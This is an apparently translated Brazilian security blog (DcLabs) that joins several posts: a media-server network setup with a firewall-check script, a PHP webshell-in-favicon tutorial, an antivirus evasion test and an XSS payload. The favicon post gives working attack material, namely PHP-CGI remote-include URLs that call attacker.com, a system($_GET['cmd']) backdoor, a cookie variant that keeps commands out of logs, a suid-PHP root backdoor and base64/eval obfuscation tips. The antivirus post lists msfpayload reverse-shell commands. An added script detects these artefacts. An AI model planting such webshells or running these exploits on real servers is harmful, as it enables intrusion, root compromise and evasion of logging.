Select PMSEncoder as the default and disable the others; even with PMSEncoder as the default, PMS still tries to run the video with VLC and it doesn't work. Alternatively you can leave them enabled, go into the #Transcode# directory already mentioned and find the file for the playback (YouTube ID + [encoder name]) that uses PMSEncoder. I don't think that's a good idea if you have a large video list, because this directory holds the playbacks for all the encoders: when one video ends it automatically moves on to the next, and every time it can't play one, a prompt appears asking whether to go to the next. So if you want to play lots of YouTube videos, disable the other encoders; that way you won't get that interruption, since only the playback for PMSEncoder will be created. </div>
<div class="MsoNormal">
<br />
Web audio streaming engines.<br />
For DI.fm to work, set FFmpeg Web Audio as the default and disable VLC.</div>
<div class="MsoNormal">
<br />
UPDATE:<br />
I just tested with mp4 files and even when configured to skip encoding for this extension, the wretched PMS insists on doing it, i.e. freezing problems again. <br />
Solution: just rename the file from .mp4 to .avi and the encoding won't be run.<br />
<br /></div>
<div class="MsoNormal">
Done! Click Save at the top of the screen and click Restart Server.<br />
Now go to your TV and be happy! <br />
Note: When the program is closed, some of these settings may be lost (or I screwed something up), so check everything when you use PMS again.</div>
<div class="MsoNormal">
<br />
Security:<br />
Use a strong password on both the personal network and the NWM. Even though the NWM is off the internet, someone can get in if you use a weak password. <br />
Recommendations: <br />
Use WPA2+AES on both networks.<br />
Disable WPS on both networks.<br />
Keep the firewall enabled on the PC/notebook and open only the port used by PMS (5001)<br />
On your personal network, create a MAC filter on the router and register only the devices you know.<br />
<br />
</div>
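<div class="MsoNormal">
An added example, not code from the post, that ties the network recipe above to this security section. It checks the two-network plan the way I would before trusting the "bridge" notebook (the NWM subnet must not overlap the personal one, every host must sit inside its router's subnet, and no two hosts may share an address) and then writes the firewall rule for port 5001 scoped to the NWM dongle address and the NWM subnet only, so nothing on the personal network or the internet can reach the media server. The addresses are the post's own; the netsh advfirewall syntax is my assumption, since the post names no firewall tool, and the second rule (SSDP, UDP 1900) is my addition: DLNA devices find a server through SSDP, so once the firewall is tightened the TV needs that rule too or it will not see PMS at all.</div>

```python
"""Sanity checks for the personal + NetWorkMedia (NWM) plan and the PMS firewall scope.

Added example, not from the post. Addresses are the post's own; the firewall
commands use netsh advfirewall syntax (an assumption: the post names no tool).
"""
import ipaddress
from collections import Counter

# Values from the recipe; the TV address is the post's example 192.168.1.101.
PERSONAL = {"router": "192.168.0.1", "gateway": "192.168.0.1",
            "notebook": "192.168.0.100", "netmask": "255.255.255.0"}
NWM = {"router": "192.168.1.1", "gateway": "192.168.1.1", "notebook": "192.168.1.100",
       "tv": "192.168.1.101", "netmask": "255.255.255.0"}
PMS_PORT = 5001  # the PMS port the security section opens


def network_of(cfg):
    """Subnet implied by the router address and netmask (192.168.1.1 + /24 mask -> 192.168.1.0/24)."""
    return ipaddress.ip_interface(f"{cfg['router']}/{cfg['netmask']}").network


def check_network(label, cfg):
    """Hosts must sit inside the router's subnet, avoid the network and broadcast
    addresses, and not collide (router and gateway being the same box is expected)."""
    net = network_of(cfg)
    problems = []
    hosts = {role: ipaddress.ip_address(addr) for role, addr in cfg.items() if role != "netmask"}
    for role, addr in hosts.items():
        if addr not in net:
            problems.append(f"{label}: {role} {addr} is outside {net}")
        elif addr in (net.network_address, net.broadcast_address):
            problems.append(f"{label}: {role} {addr} is the network or broadcast address")
    counts = Counter(addr for role, addr in hosts.items() if role != "gateway")
    for addr, n in counts.items():
        if n > 1:
            problems.append(f"{label}: {addr} is assigned {n} times")
    return net, problems


def check_plan(personal, nwm):
    """The recipe's hard rule: the two subnets must not overlap, otherwise the
    notebook cannot tell which interface a 192.168.x.y packet belongs to."""
    p_net, problems = check_network("personal", personal)
    n_net, more = check_network("NWM", nwm)
    problems += more
    if p_net.overlaps(n_net):
        problems.append(f"personal {p_net} and NWM {n_net} overlap")
    return problems


def pms_firewall_rules(nwm, port=PMS_PORT):
    """Inbound allow rules limited to the NWM. The PMS rule binds to the dongle
    address and accepts only the NWM subnet. The SSDP rule (my addition) has no
    localip because the TV's discovery search is sent to the SSDP multicast
    group, not to the dongle address; it is still limited to NWM sources."""
    net = network_of(nwm)
    return [
        f'netsh advfirewall firewall add rule name="PMS http" dir=in action=allow '
        f"protocol=TCP localport={port} localip={nwm['notebook']} remoteip={net}",
        f'netsh advfirewall firewall add rule name="PMS ssdp" dir=in action=allow '
        f"protocol=UDP localport=1900 remoteip={net}",
    ]


if __name__ == "__main__":
    print("plan problems:", check_plan(PERSONAL, NWM) or "none")
    for rule in pms_firewall_rules(NWM):
        print(rule)
```

<div class="MsoNormal">
With the post's addresses the plan check comes back empty; change the NWM router to 192.168.0.1 and it reports the overlap the recipe warns about in capitals. The scoped rules replace a blanket "allow 5001" so that the personal-network side of the notebook, which is the side with internet access, exposes nothing.</div>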
<br />
<div class="MsoNormal">
Conclusion: <br />
I've watched all the available episodes of Mr. Robot.<br />
No more loading and encoding problems.<br />
When I shut down or disconnect my notebook, the NWM stays isolated from the internet. <br />
I don't have millions of cables plugged into the TV.<br />
It was a hell of a tedious and slow job, because of missing or bad documentation, but at the same time very rewarding to see it all working in the end.<br />
<br />
Next challenges to improve the NWM: <br />
Integration with Popcorn Time.<br />
Desktop streaming.<br />
Connecting the TV to the home theater without cables. Didn't do it because I haven't bought the home theater yet! Hahaha<br />
Any suggestions? Call me! @crashbrz or #dclabs @ freenode</div>
2012-10-10 [DcLabs] - Running BackTrack 5 on Android<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-cKBiR6eD82w/UHXSAsl0nVI/AAAAAAAAABE/yfP-POr8eKs/s1600/Screenshot_2012-09-30-12-31-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://2.bp.blogspot.com/-cKBiR6eD82w/UHXSAsl0nVI/AAAAAAAAABE/yfP-POr8eKs/s640/Screenshot_2012-09-30-12-31-48.png" width="640" /></a></div>
<br />
<div style="text-align: justify;">
This paper was inspired by the talk “Hacking from the Restroom” by the Brazilian researcher Bruno Gonçalves, presented at the “HITB MALAYSIA” security conference in 2009, and is based on the “Linux on Android” project.<br />
We will show how it is possible to run BackTrack on your smartphone and use it to carry out a basic pentest where your notebook cannot go with you.</div>
<div style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
The paper and the other required files can be accessed via this link: <a href="https://docs.google.com/open?id=0B8FxJ0KnE3nrUWdrRVBVYUZLdjQ">https://docs.google.com/open?id=0B8FxJ0KnE3nrUWdrRVBVYUZLdjQ</a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/--CI--gwUihs/UHXSFdJXlDI/AAAAAAAAABM/iSrS-anSAvM/s1600/Screenshot_2012-10-02-14-20-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://4.bp.blogspot.com/--CI--gwUihs/UHXSFdJXlDI/AAAAAAAAABM/iSrS-anSAvM/s640/Screenshot_2012-10-02-14-20-59.png" width="640" /></a></div>
<br />
By: Rêner Alberto (Gr1nch)<br />
Twitter: @Gr1nchDc<br />
irc.freenode.net /j #DcLabs
2012-08-23 Backdoor PHP Favicon/Images - Web Shell Root
Well folks, I'll start this post by clearing up a few things:<br />
<br />
A few days ago a discussion came up about LFI and RFI because of the <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823" target="_blank">PHP CGI</a> flaw.<br />
In short, when doing an RFI through this flaw it hardly matters what the extension of the included file is; it can be .txt, .gif, .jpg, .ico or even .php, as long as the server hosting the .php file does not interpret it.<br />
<br />
Ex: http://alvo.com/bug.php?<span style="background-color: white; color: #008800; font-family: Fixedsys; font-size: 14px; line-height: 19px;">-d+allow_url_include%3don+-d+auto_prepend_file%3dhttp://attacker.com/cmd.txt</span><br />
<br />
Ex: http://alvo.com/bug.php?<span style="background-color: white; color: #008800; font-family: Fixedsys; font-size: 14px; line-height: 19px;">-d+allow_url_include%3don+-d+auto_prepend_file%3dhttp://attacker.com/cmd.gif</span><br />
<br />
Ex: http://alvo.com/bug.php?<span style="background-color: white; color: #008800; font-family: Fixedsys; font-size: 14px; line-height: 19px;">-d+allow_url_include%3don+-d+auto_prepend_file%3dhttp://attacker.com/cmd.php</span><br />
<span style="background-color: white; color: #008800; font-family: Fixedsys; font-size: 14px; line-height: 19px;"><br /></span>
As I mentioned, in the third example the attacker server must not interpret .php files.<br />
Further down I will explain why the extension makes no difference.<br />
<br />
Now to what matters:<br />
<br />
The idea here is to plant a backdoor and access it through LFI in a not very usual way.<br />
For this we will use the <a href="http://en.wikipedia.org/wiki/Favicon" target="_blank">Favicon</a>; it was chosen because I ran several tests with pictures and many of them had code execution problems due to the characters that make up the image, whereas the favicon is very simple and has few characters, which reduces the chance of execution problems.<br />
<br />
I created a favicon <a href="http://www.favicon.cc/" target="_blank">on this site</a>, very simple, just the letters DC in blue.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-yxUwH1tn3Zc/UDVv9MFmZWI/AAAAAAAAAU8/tuJS3xtnDqQ/s1600/ScreenHunter_06+Aug.+22+20.48.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="311" src="http://4.bp.blogspot.com/-yxUwH1tn3Zc/UDVv9MFmZWI/AAAAAAAAAU8/tuJS3xtnDqQ/s320/ScreenHunter_06+Aug.+22+20.48.jpg" width="320" /></a></div>
<br />
<div class="" style="clear: both; text-align: left;">
<br />
Let's take a look at it in a hex editor:<br />
<br /></div>
<br />
<br />
<br />
<a href="http://1.bp.blogspot.com/-JIviuuIdCCo/UDVw0174aOI/AAAAAAAAAVE/F3psWqLY17g/s1600/ScreenHunter_07+Aug.+22+20.52.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-JIviuuIdCCo/UDVw0174aOI/AAAAAAAAAVE/F3psWqLY17g/s1600/ScreenHunter_07+Aug.+22+20.52.jpg" /></a><br />
<br />
In Chrome it is shown in the top left corner of the tab:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-V2qJXDk9zcA/UDVxczTknuI/AAAAAAAAAVM/mQYm1Mw9fG0/s1600/ScreenHunter_08+Aug.+22+20.54.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-V2qJXDk9zcA/UDVxczTknuI/AAAAAAAAAVM/mQYm1Mw9fG0/s1600/ScreenHunter_08+Aug.+22+20.54.jpg" /></a></div>
<br />
In IE it sits in the address bar:<br />
<br />
<br />
<a href="http://2.bp.blogspot.com/-MBX3lm5Q4D0/UDVx8zJT7oI/AAAAAAAAAVU/mJ97zWsvEhM/s1600/ScreenHunter_09+Aug.+22+20.57.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-MBX3lm5Q4D0/UDVx8zJT7oI/AAAAAAAAAVU/mJ97zWsvEhM/s1600/ScreenHunter_09+Aug.+22+20.57.jpg" /></a><br />
<br />
Direct access:<br />
<br />
<br />
<br />
<a href="http://3.bp.blogspot.com/-upWh4tI-Ozo/UDVybeVvu4I/AAAAAAAAAVc/KfCCtWcrH4w/s1600/ScreenHunter_10+Aug.+22+20.59.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-upWh4tI-Ozo/UDVybeVvu4I/AAAAAAAAAVc/KfCCtWcrH4w/s1600/ScreenHunter_10+Aug.+22+20.59.jpg" /></a><br />
<br />
Now let's modify it and append the following line:<br />
<?php system($_GET['cmd']); ?> which will effectively be our backdoor.<br />
You can swap the system function for the one you prefer.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-A6cbm8nN9RY/UDV0IlIcDII/AAAAAAAAAVs/BaSkDvlLHEI/s1600/ScreenHunter_12+Aug.+22+21.06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-A6cbm8nN9RY/UDV0IlIcDII/AAAAAAAAAVs/BaSkDvlLHEI/s1600/ScreenHunter_12+Aug.+22+21.06.jpg" /></a></div>
<br />
When requesting it again, it is still displayed without problems, even after the PHP code was appended. So far so good!<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-xFi5SONwbyw/UDV5WhhpSlI/AAAAAAAAAWE/xOeLe3cqN0U/s1600/ScreenHunter_14+Aug.+22+21.28.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-xFi5SONwbyw/UDV5WhhpSlI/AAAAAAAAAWE/xOeLe3cqN0U/s1600/ScreenHunter_14+Aug.+22+21.28.jpg" /></a></div>
<br />
Now we include the file and pass the commands:<br />
http://srvlfi.dc/lfi.php?inc=favicon.ico&cmd=id
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-PY-3oQnyVF0/UDV80ltqi8I/AAAAAAAAAWU/rH4YnGBBH3Y/s1600/ScreenHunter_17+Aug.+22+21.43.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-PY-3oQnyVF0/UDV80ltqi8I/AAAAAAAAAWU/rH4YnGBBH3Y/s1600/ScreenHunter_17+Aug.+22+21.43.jpg" /></a></div>
<br />
After all that, let's understand why this happens:<br />
<br />
PHP's include function (and its relatives) completely ignores the file extension and dumps the file's entire content into the base .php file, in this case lfi.php, so only the file's content matters. PHP in turn, upon finding a new <?php, executes the code until it finds ?>, i.e. the end of the PHP instructions for that block of code.<br />
<br />
The drawback of this technique is the garbage displayed on screen, precisely because of the behaviour of the include functions, which output the file's content until they find the PHP markers.<br />
<br />
<br />
Another important point would be to use cookies to pass the commands to PHP, which avoids sending the commands via GET or POST and polluting the server log even further.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-A2QIsUvLf8A/UDYbQub3Q3I/AAAAAAAAAWk/JkIvHG-MM90/s1600/ScreenHunter_01+Aug.+23+08.58.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-A2QIsUvLf8A/UDYbQub3Q3I/AAAAAAAAAWk/JkIvHG-MM90/s1600/ScreenHunter_01+Aug.+23+08.58.gif" /></a></div>
<br />
Log without cookie: [23/Aug/2012:08:59:38 -0300] "GET /lfi.php?lfi=oi2.gif&cmd=uname%20-a HTTP/1.1" 200 384 "-" "Mozilla/5.0<br />
<br />
Log with the command passed via cookie: [23/Aug/2012:09:01:13 -0300] "GET /lfi.php?lfi=oi.gif HTTP/1.1" 200 384 "-" "Mozilla/5.0<br />
<br />
The code for this implementation is very simple:<br />
<br />
setcookie("cmd_cookie", "id");<br />
system($_COOKIE["cmd_cookie"]);<br />
<br />
Just change the cookie value with your preferred tool.<br />
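As an added defender-side example (not part of the original post or its code), the following Python script checks for the three artefacts described above: the PHP-CGI `-d` query strings, PHP open tags appended to an image file that include() will execute regardless of extension, and the fact that a cookie-borne command still leaves the include of a non-.php file in the access log even when the command itself is gone. The sample ICO bytes and log lines are constructed, and the INCLUDE_PARAMS list of parameter names is an assumption.

```python
"""Detect the favicon-webshell and include-abuse artefacts described in the post.

Added defensive example; the sample image bytes and log lines are constructed,
and the parameter names in INCLUDE_PARAMS are an assumption, not from the post.
"""
import re
from pathlib import Path
from typing import Dict, List, Optional
from urllib.parse import unquote

# Magic bytes of the image formats the post works with (ICO favicon, GIF, JPEG).
IMAGE_MAGIC = {b"\x00\x00\x01\x00": "ico", b"GIF8": "gif", b"\xff\xd8\xff": "jpeg"}

# PHP open tags. include() ignores the extension and starts executing at the
# first of these, so any occurrence inside image data is a webshell indicator.
# A bare '<? ' short tag only runs when short_open_tag is on, but is flagged too.
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)

# Query parameters that typically name a file to include (assumed list; the
# post's vulnerable script used 'inc' and 'lfi').
INCLUDE_PARAMS = {"inc", "lfi", "file", "page", "include"}

# Request line of an Apache/nginx combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def image_kind(data: bytes) -> Optional[str]:
    """Image type by magic bytes, or None if the bytes are not an image we know."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def find_embedded_php(data: bytes) -> List[int]:
    """Byte offsets of PHP open tags inside an image body; empty means clean."""
    if image_kind(data) is None:
        return []
    return [m.start() for m in PHP_TAG_RE.finditer(data)]


def scan_tree(root: Path) -> Dict[str, List[int]]:
    """Walk a web root and report image files that carry PHP open tags."""
    hits: Dict[str, List[int]] = {}
    for path in root.rglob("*"):
        if path.is_file():
            offsets = find_embedded_php(path.read_bytes())
            if offsets:
                hits[str(path)] = offsets
    return hits


def classify_request(target: str) -> List[str]:
    """Reasons a request target matches the abuse patterns from the post."""
    reasons: List[str] = []
    _path, _, query = target.partition("?")
    # PHP-CGI argument injection (CVE-2012-1823): the query string is handed to
    # php-cgi as argv, so it starts with a switch such as '-d'.
    if re.match(r"^(?:-|%2d)[a-z]", query, re.IGNORECASE):
        reasons.append("php-cgi argument injection")
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        name, value = name.lower(), unquote(value)
        if name in INCLUDE_PARAMS:
            if value.lower().startswith(("http://", "https://", "ftp://")):
                reasons.append(f"remote include: {value}")
            elif not value.lower().endswith(".php"):
                reasons.append(f"include of non-php file: {value}")
        elif name == "cmd":
            reasons.append("cmd parameter in query")
    return reasons


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Flag access-log lines whose request matches any pattern above."""
    flagged: List[Dict[str, object]] = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            flagged.append({"line": line, "reasons": reasons})
    return flagged


# Constructed sample: a minimal 1x1 ICO header and directory entry followed by
# a benign PHP marker in place of the post's backdoor line.
SAMPLE_ICO = (
    b"\x00\x00\x01\x00\x01\x00"            # ICONDIR: reserved, type=1 (icon), count=1
    + b"\x01\x01\x00\x00\x01\x00\x20\x00"  # ICONDIRENTRY: 1x1, 1 plane, 32 bpp ...
    + b"\x30\x00\x00\x00\x16\x00\x00\x00"  # ... 48 bytes of image data at offset 22
    + b"\x00" * 48                          # image data (zeros: constructed)
    + b"<?php echo 'marker'; ?>"            # appended PHP block, starts at offset 70
)

# Constructed log lines modelled on the two entries shown in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Aug/2012:08:59:38 -0300] "GET /lfi.php?lfi=oi2.gif&cmd=uname%20-a HTTP/1.1" 200 384 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Aug/2012:09:01:13 -0300] "GET /lfi.php?lfi=oi.gif HTTP/1.1" 200 384 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [23/Aug/2012:09:02:00 -0300] "GET /bug.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dhttp://attacker.example/cmd.txt HTTP/1.1" 200 512 "-" "curl/7.26"',
    '198.51.100.2 - - [23/Aug/2012:09:03:00 -0300] "GET /index.php?page=about.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [23/Aug/2012:09:04:00 -0300] "GET /favicon.ico HTTP/1.1" 200 318 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("PHP tag offsets in sample icon:", find_embedded_php(SAMPLE_ICO))
    for hit in scan_log(SAMPLE_LOG):
        print(hit["reasons"], "<-", hit["line"])
```

Note that the second sample line (the cookie variant from the post) is still flagged: the command is gone from the log, but the include of a .gif by an include-style parameter is not.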
<br />
Doing a quick search together with Psylon, we found this <a href="https://bechtsoudis.com/hacking/php-code-into-jpeg-metadata-from-hide-to-unhide/" target="_blank">post</a>, which talks about adding PHP code to an image, but it requires adding information to .htaccess. This line makes the PHP interpreter treat .jpg files as files to be interpreted as well.<br />
<br />
<span style="color: red; font-family: monospace; font-size: 12px; line-height: 13px; margin: 0px; padding: 0px;">root@webtestbed</span><span style="background-color: #cccccc; font-family: monospace; font-size: 12px; line-height: 13px;">:</span><span style="color: blue; font-family: monospace; font-size: 12px; line-height: 13px; margin: 0px; padding: 0px;">/var/www/media</span><span style="background-color: #cccccc; font-family: monospace; font-size: 12px; line-height: 13px;"># echo “AddType application/x-httpd-php .jpg” >> .htaccess</span><br />
<br />
Now, assuming that everything we did is post-exploitation and that, like the researcher above, we have modified files, the following was done:<br /><br />Set the suid bit on the PHP binary<br /><br />chmod 4755 /usr/bin/php5 (the path may/will vary depending on the Linux flavour)<br /><br />
root@srvlfi:/var/www# ls -al /usr/bin/php5<br />
-rwsr-xr-x 1 root root 7463060 2012-02-11 05:07 /usr/bin/php5<br /><br />Created an icon named suid.ico with the following code (at the end of the file, after the icon's own data, of course):<br /><br />
<?php<br />
posix_seteuid(0);<br />
passthru($argv[1]);<br />
?><br />
<div>
<br /></div>
<br />
In this case the <a href="http://php.net/manual/en/reserved.variables.argv.php" target="_blank">$argv[1]</a> variable was used to receive the value, because even with suid on the PHP binary it is not possible to elevate privilege using <a href="http://www.php.net/manual/en/function.posix-seteuid.php" target="_blank">posix_seteuid</a>, due to the architecture and protections in place (it was not always like this), so to work around it the idea was to have the backdoor itself run the suid PHP binary, passing the path of the malicious icon together with the command to be run as root. As you can see below, $argv[1] therefore has the value id;uname -a<br />
<br />
<a href="http://srvlfi.dc/oi.php?cmd=/usr/bin/php5%20/var/www/suid.ico%20%22id;uname%20-a%22">http://srvlfi.dc/oi.php?cmd=/usr/bin/php5%20/var/www/suid.ico%20%22id;uname%20-a%22</a><br /><br />Note: for commands with arguments, e.g. uname -a, you must use double quotes to indicate that it is a single command; otherwise PHP will treat "-a" as the third element of the array - $argv[2]<br /><br />And yes, THIRD element; if in doubt check the $argv[1] link.<br />
<br />
<a href="http://2.bp.blogspot.com/-SvnWwd-tGeo/UDaxoqOyKII/AAAAAAAAAW0/vJyM8CDuEeA/s1600/ScreenHunter_18+Aug.+23+19.41.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-SvnWwd-tGeo/UDaxoqOyKII/AAAAAAAAAW0/vJyM8CDuEeA/s1600/ScreenHunter_18+Aug.+23+19.41.jpg" /></a><br />
<br />
Another tip: if your backdoor code is getting large, use the base64 encoding functions and PHP's eval function.<br />
<br />
<br />
I hope this was a useful contribution.<br /><br />Thanks to: @l0c4lh05t - @gmlnet<br />Me: @crashbrz<br />
<br />
<br />
<br />
2012-08-07 Results of the tests with Psafe Protege AntiVirus<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.acidezmental.xpg.com.br/imagens/psafe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.acidezmental.xpg.com.br/imagens/psafe.jpg" /></a></div>
<br />
Does Psafe really protect?<br />
<br />
Well, first I would like to say that this research at no point intended to compare Psafe with any other AV on the market.<br />
<br />
Research details:<br />
<br />
Operating system used: Windows 2003 Server R2<br />
AV: Psafe Protege<br />
Additional software: IIS6 (only for the webshell tests)<br />
<br />
Below is the table with the tests performed:<br />
<table border="1" cellpadding="3" cellspacing="0" id="tblMain"><tbody>
<tr><th>Webshells</th><th>Encoding</th><th>Extension changed</th><th>Detected on write?</th><th>Detected on execution?</th><th>Detected by manual scan?</th></tr>
<tr><td>ASP</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><td>ASPX</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><td>JSP</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><td>Perl</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><td>PHP</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><td>CFM</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><th>Metasploit executables</th><th>Encoding</th><th>Extension changed</th><th>Detected on write?</th><th>Detected on execution?</th><th>Detected by manual scan?</th><th>Command:</th></tr>
<tr><td>Sample 1 Bind on port 6666</td><td>No</td><td>No</td><td>No</td><td>No</td><td>No</td><td>msfpayload windows/shell_bind_tcp LPORT=6666 X > /tmp/msf_sample1.exe</td></tr>
<tr><td>Sample 2 Reverse shell on port 6666</td><td>No</td><td>No</td><td>No</td><td>No</td><td>No</td><td>msfpayload windows/shell_reverse_tcp LHOST=172.16.0.1 LPORT=6666 X > /tmp/msf_sample2.exe</td></tr>
<tr><td>Sample 3 Arbitrary Command Exec</td><td>No</td><td>No</td><td>No</td><td>No</td><td>No</td><td>msfpayload windows/exec CMD=calc.exe X > /tmp/msf_sample3.exe</td></tr>
<tr><th>DoS tools</th><th>Encoding</th><th>Extension changed</th><th>Detected on write?</th><th>Detected on execution?</th><th>Detected by manual scan?</th></tr>
<tr><td>SlowLoris</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><td>Loic</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><th>IRC bots (Perl)</th><th>Encoding</th><th>Extension changed</th><th>Detected on write?</th><th>Detected on execution?</th><th>Detected by manual scan?</th></tr>
<tr><td>AlphaNix 2.0</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><td>Scane</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><td>Sexi</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><td>Shellbot</td><td>Plain text</td><td>No</td><td>No</td><td>No</td><td>No</td></tr>
<tr><th>EICAR.org samples</th><th>Packing</th><th>Extension changed</th><th>Detected on write?</th><th>Detected on execution?</th><th>Detected by manual scan?</th></tr>
<tr><td><a href="http://www.google.com/url?q=http://eicar.com&usd=2&usg=ALhdy29CErZDYj-ksBvOYq8injk-s4_s8g" target="_blank">eicar.com</a></td><td>No</td><td>No</td><td>No</td><td>No</td><td>Yes</td></tr>
<tr><td>eicar.com.txt</td><td>No</td><td>Yes</td><td>No</td><td>N/A</td><td>Yes</td></tr>
<tr><td>eicar_com.zip</td><td>No</td><td>Compressed</td><td>No</td><td>N/A</td><td>No</td></tr>
<tr><td>eicarcom2.zip</td><td>No</td><td>Compressed</td><td>No</td><td>N/A</td><td>No</td></tr>
</tbody></table>
<br />
<div>
<span style="font-family: inherit;">The tests were carried out on 6 and 7 August 2012.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">On the 6th the Metasploit sample1 had not been detected; on the 7th it was detected (Trojan.Generic) and removed, but only by a manual scan. When executed, the binaries generated with Metasploit opened ports, connected to the Internet and ran commands, and even so PSafe raised no alert at all. Another serious problem: after msf_sample1.exe was detected we generated it again, changing only the port to 6667, and it was no longer detected.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">We tested several malware samples aimed at stealing banking passwords and the like; the detection rate was low. Of the 35 samples analysed, only 7 were detected.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Of those detected, we used the one with the signature HEUR/Malware.QVM20.Gen for a few more tests:</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">- It was not detected on write.</span><br />
<span style="font-family: inherit;">- It was still detected after changing the extension.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">When we ran the malware through a simple executable packer (ASPack), it stopped being detected by the manual scan; only the .bak file left behind by ASPack was removed.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Another important point: there is no checking of malicious web addresses. During the research we visited several sites known to distribute malware and no alert was generated.<br /><br />Conclusion:</span><br />
<span style="line-height: 14px; white-space: pre-wrap;"><span style="font-family: inherit;">The AV proved ineffective for its purpose, showing a low malware detection rate, especially against the families most common in Brazil, which give access to bank accounts and can cause all sorts of losses for most Internet users in the country. </span></span><br />
<span style="line-height: 14px; white-space: pre-wrap;"><span style="font-family: inherit;"><br /></span></span>
<span style="line-height: 14px; white-space: pre-wrap;"><span style="font-family: inherit;">This is made worse by the company positioning its product as "the only complete and totally free antivirus in existence", which may lead home users to believe it reaches a level of perfection compared to competitors, something that does not match what these tests found.
</span></span><br />
<br />
---------------------------------------------------------------------------------------------------------<br />
<br />
This research was done together with Gabriel Lanzi (Psylon) @gmlnet<br />
I would like to thank Fio (@fiocavallari @BrauvonHacker) for the help with the samples, and my friend
Lincoln Werneck (@lincolnwerneck) of Instituto Coaliza (@Coaliza) for the help writing this post.<br />
<br /></div>Unknownnoreply@blogger.com52tag:blogger.com,1999:blog-2185986060583872831.post-61138760122490870172012-08-05T06:26:00.001-07:002012-08-05T07:07:05.478-07:00XSS without quotes<br />
<span style="font-family: arial;">Good morning, gentlemen,</span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">Here is an interesting XSS I found on the forum: http://www.garage4hackers.com/f11/unusual-xss-payload-2522.html </span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">I'll do a short analysis of the payload used.<br /><br /> The code is below: </span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;"><b>alert(String(/DcLabs/).substr(1,6) ); </b></span><br />
<span style="font-family: arial;"><br /></span><br />
